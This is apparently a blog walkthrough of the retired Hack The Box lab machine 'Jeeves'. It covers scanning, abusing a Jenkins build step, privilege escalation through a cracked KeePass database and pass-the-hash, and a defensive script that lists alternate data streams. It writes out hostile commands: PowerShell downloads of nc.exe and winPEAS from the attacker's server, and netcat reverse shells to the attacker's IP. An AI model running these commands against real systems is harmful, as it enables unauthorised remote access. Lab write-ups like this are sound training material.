Jeeves Retired Box from Hackthebox

Cyb0rgBytes
4 min read, Apr 7, 2024


In this documentation and write-up I'll be penetrating the Hackthebox retired box "Jeeves", a medium-difficulty box on Hackthebox. Without more talking, let's cut to the chase and get lost in the astonishing loophole of the matrix.

In any penetration testing engagement we start with information gathering; there are many tools at our disposal when it comes to this phase.

Let's start by pinging the target. The ping command sends ICMP Echo Requests to the target to check whether it is up:

  • ping 10.10.10.63
Ping test for availability.

Next we scan the target with nmap:

Initial Nmap Scan

We notice from the scan that the following ports are open:

  • 80 — HTTP
  • 22 — SSH
  • 445 — SMB

Next, what I'd like to do in this engagement is run the SMB version auxiliary scanner in Metasploit to check which SMB version this target is running.

SMB Version Check.

From the SMB version, and after some researching, I found that this version is vulnerable to SMBGhost (CVE-2020-0796).

As shown in the screenshot below, I've tried to exploit it, but it's not a viable approach.

Checking SMBGhost Vulnerability

Let's move on.

Through enumeration of the web directories I found a directory called askjeeves on port 50000.

Let's head to it now:

Enumeration findings through the ffuf tool.

Next, I use the following commands for execution in the Build section of Jenkins (the download and the reverse shell are two separate batch commands, so each goes on its own line):

powershell wget "http://10.10.14.3:8000/nc.exe" -outfile "nc.exe"
nc.exe -e cmd 10.10.14.3 9001

While that is being built I'm listening on port 9001:

Listening for incoming connection on port 9001.

I'm also hosting nc.exe on my Python HTTP server so I can transfer it from my box to the Jenkins box:

Setting up the Python web server.

And there we go, we got our initial foothold:

Initial Foothold.

Next, for privilege escalation I'm going to use winPEAS. First we need to transfer the file from our box to the target machine, again hosting a Python web server and downloading the file with PowerShell:

powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.3:8000/winPEASx64.exe', 'c:\windows\temp\winpeas.exe')"

While that was running I was looking around the directories, where I found something really interesting:

KeePass password database 2.x (KDBX)

So I thought of cracking it with John, so let's get to it:

John the Ripper is an open-source password security auditing and password recovery tool available for many operating systems. John the Ripper jumbo supports hundreds of hash and cipher types, including user passwords of Unix flavors.

After cracking the password and opening the database file, I found a couple more interesting pieces of information inside the database.

I found a hash for the admin user; from there I thought we could use the Pass-the-Hash technique, so let's go ahead and use it!

Identifying the KeePass database file.

And here are the steps I took to do that:

powershell wget "http://10.10.14.28:8000/nc.exe" -outfile "nc.exe"
nc.exe -e cmd 10.10.14.28 9001

After getting the initial foothold, I got admin through the Pass-the-Hash technique with the Impacket tool psexec.

After that, getting root (or admin in this case) is done by typing this command:

powershell Get-Content -Path "hm.txt" -Stream "root.txt"

Found an interesting file called hm.txt
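The -Stream parameter above reads an NTFS alternate data stream (ADS), which is where this box keeps root.txt hidden behind the innocent-looking hm.txt. As an added defensive check (my own example, not part of the original write-up), the function below walks a directory and reports every non-default stream, so data hidden this way shows up during a review. It assumes Windows with PowerShell 3.0 or later; the function name and the example path are my own choices.

```powershell
# Added example (not from the original write-up): list NTFS alternate data
# streams under a directory so hidden content such as hm.txt:root.txt is visible.
# Assumes PowerShell 3.0+ on Windows (Get-Item -Stream needs NTFS).
function Find-AlternateDataStreams {
    param(
        [Parameter(Mandatory = $true)]
        [string]$Path,
        # Zone.Identifier is written by browsers on downloaded files and is
        # usually noise, so it is hidden unless explicitly requested.
        [switch]$IncludeZoneIdentifier
    )

    Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # ':$DATA' is the primary (normal) stream; anything else is an ADS.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                Where-Object { $IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier' } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Bytes  = $_.Length
                        # The exact command a reviewer would run to inspect it.
                        Read   = "Get-Content -LiteralPath '$($file.FullName)' -Stream '$($_.Stream)'"
                    }
                }
        }
}

# Example usage (constructed path): review a user's Documents folder.
Find-AlternateDataStreams -Path "$env:USERPROFILE\Documents" | Format-Table -AutoSize
```

Run it with -IncludeZoneIdentifier when browser download markers are also of interest; `dir /r` in cmd.exe gives the same stream listing for a single directory.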

Thanks for reading, and stay tuned for the next!


Written by Cyb0rgBytes

A passionate and defensive type of ethical hacker, booted and ready to secure the world.
